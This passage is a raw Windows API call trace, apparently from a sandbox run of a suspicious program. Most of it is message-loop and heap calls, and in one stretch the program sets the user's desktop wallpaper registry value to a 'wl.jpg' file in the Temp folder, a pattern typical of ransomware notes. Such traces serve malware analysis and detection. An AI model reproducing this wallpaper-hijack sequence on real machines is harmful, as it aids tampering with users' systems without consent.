hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0271.593] timeGetTime () returned 0x118418f [0271.593] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.593] Sleep (dwMilliseconds=0xa) [0271.636] timeGetTime () returned 0x11841b9 [0271.636] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.637] Sleep (dwMilliseconds=0xa) [0271.692] timeGetTime () returned 0x11841f2 [0271.692] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.692] Sleep (dwMilliseconds=0xa) [0271.755] timeGetTime () returned 0x1184231 [0271.755] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.755] Sleep (dwMilliseconds=0xa) [0271.805] timeGetTime () returned 0x1184262 [0271.805] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.805] Sleep (dwMilliseconds=0xa) [0271.843] timeGetTime () returned 0x1184287 [0271.843] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.843] Sleep (dwMilliseconds=0xa) [0271.888] timeGetTime () returned 0x11842b4 [0271.888] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.888] Sleep (dwMilliseconds=0xa) [0271.927] timeGetTime () returned 0x11842db [0271.927] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0271.927] Sleep (dwMilliseconds=0xa) [0272.047] timeGetTime () returned 0x1184353 [0272.047] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.047] Sleep (dwMilliseconds=0xa) [0272.063] timeGetTime () returned 0x1184364 [0272.063] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.063] Sleep (dwMilliseconds=0xa) [0272.082] timeGetTime () returned 0x1184377 [0272.082] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0272.082] TranslateMessage (lpMsg=0x8cf798) returned 0 [0272.082] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0272.082] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0272.082] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0272.082] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.082] Sleep (dwMilliseconds=0xa) [0272.141] timeGetTime () returned 0x11843b1 [0272.141] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.141] Sleep (dwMilliseconds=0xa) [0272.160] timeGetTime () returned 0x11843c5 [0272.161] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.161] Sleep (dwMilliseconds=0xa) [0272.209] timeGetTime () returned 0x11843f7 [0272.209] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.209] Sleep (dwMilliseconds=0xa) [0272.224] timeGetTime () returned 0x1184406 [0272.224] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.225] Sleep (dwMilliseconds=0xa) [0272.259] timeGetTime () returned 0x1184428 [0272.259] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.259] Sleep (dwMilliseconds=0xa) [0272.309] timeGetTime () returned 0x1184459 [0272.309] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.309] Sleep (dwMilliseconds=0xa) [0272.326] timeGetTime () returned 0x118446b [0272.326] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.326] Sleep (dwMilliseconds=0xa) [0272.350] timeGetTime () returned 0x1184484 [0272.350] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.350] Sleep (dwMilliseconds=0xa) [0272.370] timeGetTime () returned 0x1184497 [0272.370] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.370] Sleep (dwMilliseconds=0xa) [0272.411] timeGetTime () returned 0x11844c0 [0272.411] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.411] Sleep (dwMilliseconds=0xa) [0272.427] timeGetTime () returned 0x11844d1 [0272.427] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.427] Sleep (dwMilliseconds=0xa) [0272.444] timeGetTime () returned 0x11844e0 [0272.444] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.444] Sleep (dwMilliseconds=0xa) [0272.460] timeGetTime () returned 0x11844f2 [0272.460] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.460] Sleep (dwMilliseconds=0xa) [0272.474] timeGetTime () returned 0x11844ff [0272.474] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.474] Sleep (dwMilliseconds=0xa) [0272.487] timeGetTime () returned 0x118450b [0272.487] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.487] Sleep (dwMilliseconds=0xa) [0272.504] timeGetTime () returned 0x118451d [0272.504] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.504] Sleep (dwMilliseconds=0xa) [0272.534] timeGetTime () returned 0x118453b [0272.534] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0272.534] Sleep (dwMilliseconds=0xa) [0272.602] timeGetTime () returned 0x1184580 [0272.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0272.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0272.603] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0272.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0272.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0272.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0272.603] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0272.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0272.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0272.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0272.605] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0272.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0272.605] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0272.605] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0272.605] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0272.605] RegCloseKey (hKey=0x2d0) returned 0x0 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0272.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0272.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0272.606] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0272.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0272.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0272.607] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0272.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0272.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0272.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0272.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0272.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0272.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0272.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0272.610] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0272.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0272.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0272.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0272.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0272.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0272.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0272.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0272.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0272.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0272.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0272.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0272.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0272.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0272.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0272.612] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 